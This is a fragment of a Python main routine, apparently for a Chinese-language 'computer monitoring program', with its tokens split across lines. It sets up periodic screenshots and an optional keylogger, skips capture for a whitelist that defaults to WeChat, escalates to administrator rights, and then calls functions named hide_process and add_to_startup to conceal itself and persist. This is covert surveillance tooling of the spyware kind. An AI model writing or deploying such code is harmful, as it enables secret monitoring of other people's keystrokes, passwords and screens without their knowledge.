type
=
str
, default
=
None
,
help
=
"图片文件存储地址"
)
parser.add_argument(
"--white_list"
,
type
=
str
, default
=
"
", help="
应用白名单 按,分割传入 默认为空")
parser.add_argument(
"--keylog"
, action
=
"store_true"
,
help
=
"启用键盘记录功能"
)
args, _
=
parser.parse_known_args()
logging.info(
"电脑监控程序启动中..."
)
config_manager
=
ConfigManager()
config
=
config_manager.load()
if
args.save_path:
SAVE_PATH
=
args.save_path
else
:
SAVE_PATH
=
config.get(
'save_path'
, os.path.join(os.path.dirname(os.path.abspath(__file__)),
"data"
))
os.makedirs(SAVE_PATH, exist_ok
=
True
)
setup_logging(SAVE_PATH)
logging.info(f
"日志系统初始化完成,保存路径: {SAVE_PATH}"
)
if
not
is_admin():
logging.warning(
"程序需要管理员权限才能正常运行"
)
run_as_admin()
sys.exit()
SLEEP_TIME
=
args.sleep
if
args.sleep !
=
5
else
config.get(
'sleep_time'
,
5
)
configPath
=
config.get(
'save_path'
, SAVE_PATH)
try
:
if
not
os.path.exists(configPath):
os.makedirs(configPath, exist_ok
=
True
)
test_file
=
os.path.join(configPath,
"test_write.tmp"
)
with
open
(test_file,
'w'
) as f:
f.write(
"test"
)
os.remove(test_file)
SAVE_PATH
=
configPath
config[
"save_path"
]
=
SAVE_PATH
setup_logging(SAVE_PATH)
except
Exception as e:
log_error(f
"配置路径不可用: {str(e)}"
)
logging.info(f
"使用保存路径: {SAVE_PATH}"
)
today
=
datetime.now().strftime(
'%Y-%m-%d'
)
daily_dir
=
os.path.join(SAVE_PATH, today)
os.makedirs(daily_dir, exist_ok
=
True
)
WHITE_LIST
=
args.white_list
white_list
=
config.get(
'white_list'
, [
'微信'
,
'WeChat'
,
'聊天文件'
,
'朋友圈'
])
if
WHITE_LIST:
str_list
=
WHITE_LIST.split(
","
)
white_list
=
list
(
set
(str_list
+
white_list))
config[
"white_list"
]
=
white_list
should_save_config
=
False
if
args.keylog:
KEYLOGGER_ENABLED
=
True
if
not
config.get(
'keylogger_enabled'
,
False
):
config[
"keylogger_enabled"
]
=
True
should_save_config
=
True
logging.info(
"通过命令行启用键盘记录,并保存到配置"
)
else
:
KEYLOGGER_ENABLED
=
config.get(
'keylogger_enabled'
,
False
)
logging.info(f
"根据配置文件设置键盘记录状态: {KEYLOGGER_ENABLED}"
)
KEYLOGGER_RESPECT_WHITELIST
=
config.get(
'keylogger_respect_whitelist'
,
True
)
if
should_save_config:
config_manager.config
=
config
if
config_manager.save():
logging.info(
"配置已更新并保存"
)
else
:
logging.warning(
"配置保存失败"
)
hide_process()
hotkey_manager
=
HotkeyManager(config_manager)
if
not
hotkey_manager.start():
show_hotkey_conflict_message()
sys.exit(
1
)
backup_hotkey_hwnd
=
create_backup_hotkey_listener()
show_startup_message(config, hotkey_manager)
logging.info(f
"截图服务启动 - 保存路径: {SAVE_PATH}, 间隔时间: {SLEEP_TIME}秒"
)
logging.info(f
"当前白名单: {white_list}"
)
logging.info(f
"键盘记录功能: {'已启用' if KEYLOGGER_ENABLED else '已禁用'}"
)
logging.info(f
"退出快捷键: {hotkey_manager.current_hotkey}"
)
screenshot_manager
=
ScreenshotManager(SAVE_PATH, SLEEP_TIME)
screenshot_manager.start()
if
KEYLOGGER_ENABLED:
keyboard_listener
=
start_keylogger(SAVE_PATH, KEYLOGGER_RESPECT_WHITELIST)
add_to_startup(config)
run_main_loop(screenshot_manager)
except
KeyboardInterrupt:
logging.info(
"程序被中断"
)
except
Exception as e:
log_error(f
"程序发生严重错误: {str(e)}"
, e)
finally
:
cleanup_resources(screenshot_manager, hotkey_manager, keyboard_listener, backup_hotkey_hwnd)
if
__name__
=
=
"__main__"
:
log_file
=
os.path.join(os.path.dirname(os.path.abspath(__file__)),
"pcmon.log"
)
logging.basicConfig(
level
=
logging.INFO,
format
=
"%(asctime)s - %(levelname)s - %(message)s"
,
handlers
=
[
logging.FileHandler(log_file, encoding
=
"utf-8"
),
logging.StreamHandler()
]
)
logging.info(
"程序启动"
)
try
:
GLOBAL_KEYS_PRESSED.clear()
exit_event.clear()
main()
except
Exception as e:
log_error(
"程序启动失败"
, e)
logging.critical(f
"程序意外退出: {str(e)}"
)
print
(f
"程序发生严重错误: {str(e)}"
)
input
(
"按任意键退出..."
)
sys.exit(
1
)